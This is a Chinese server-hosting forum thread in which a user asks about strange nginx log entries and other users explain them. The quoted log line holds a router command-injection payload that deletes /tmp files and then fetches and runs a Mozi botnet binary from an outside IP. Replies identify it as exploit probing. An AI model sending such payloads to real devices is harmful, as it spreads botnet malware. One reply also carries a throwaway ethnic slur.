立即注册  找回密码
 立即注册
CeraNetworksBGVM服务器主机交流会员请立即修改密码Sharktech防护
查看: 46|回复: 7

nginx 莫名奇妙的日志,请大家分析一下。

[复制链接]

nginx 莫名奇妙的日志,请大家分析一下。

[复制链接]

120

主题

119

回帖

1092

积分

金牌会员

积分
1092
调查员

120

主题

119

回帖

1092

积分

金牌会员

积分
1092
2024-9-8 12:25:17 | 显示全部楼层 |阅读模式
系统是刚装几天的,就装了 nginx 反代一个docker容器,不是80端口

但是nginx就老发现一些奇怪的日志。

比如下面这个。居然还有 “rm+-rf”  这种命令


117.253.56.151 - - [08/Sep/2024:02:59:55 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=
rm+-rf
+/tmp/*;wget+http://117.219.161.81:50626/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 146 "-" "-" "-"
回复

使用道具 举报

59

主题

940

回帖

2991

积分

金牌会员

积分
2991
larry

59

主题

940

回帖

2991

积分

金牌会员

积分
2991
2024-9-8 12:44:00 | 显示全部楼层

调查员 发表于 2024-9-8 12:28

不会吧,用访问不存在网页的方式,也能试漏洞?

他不访问怎么知道不存在?
回复

使用道具 举报

27

主题

270

回帖

1187

积分

金牌会员

积分
1187
loverhoc

27

主题

270

回帖

1187

积分

金牌会员

积分
1187
2024-9-8 12:28:00 | 显示全部楼层
别人在试漏洞,执行命令
回复

使用道具 举报

120

主题

119

回帖

1092

积分

金牌会员

积分
1092
调查员 楼主

120

主题

119

回帖

1092

积分

金牌会员

积分
1092
2024-9-8 12:26:42 | 显示全部楼层

loverhoc 发表于 2024-9-8 12:26

别人在试漏洞,执行命令

不会吧,用访问不存在网页的方式,也能试漏洞?
回复

使用道具 举报

4

主题

182

回帖

694

积分

高级会员

积分
694
wps

4

主题

182

回帖

694

积分

高级会员

积分
694
2024-9-8 12:28:10 | 显示全部楼层
这是一个针对路由器的漏洞CNNVD-201306-024
回复

使用道具 举报

120

主题

119

回帖

1092

积分

金牌会员

积分
1092
调查员 楼主

120

主题

119

回帖

1092

积分

金牌会员

积分
1092
2024-9-8 12:26:00 | 显示全部楼层

wps 发表于 2024-9-8 12:30

这是一个针对路由器的漏洞CNNVD-201306-024

看来大家的路由器,80端口真的不要轻易打开。
回复

使用道具 举报

120

主题

119

回帖

1092

积分

金牌会员

积分
1092
调查员 楼主

120

主题

119

回帖

1092

积分

金牌会员

积分
1092
2024-9-8 12:30:17 | 显示全部楼层
印度人在干坏事。
回复

使用道具 举报

4

主题

2356

回帖

5214

积分

论坛元老

积分
5214
icon

4

主题

2356

回帖

5214

积分

论坛元老

积分
5214
2024-9-8 12:31:26 | 显示全部楼层
看这些你不是不是觉得太无聊了?
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|小黑屋|HS2V主机综合交流论坛

GMT+8, 2024-11-25 23:32 , Processed in 0.027720 second(s), 3 queries , Gzip On, Redis On.

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表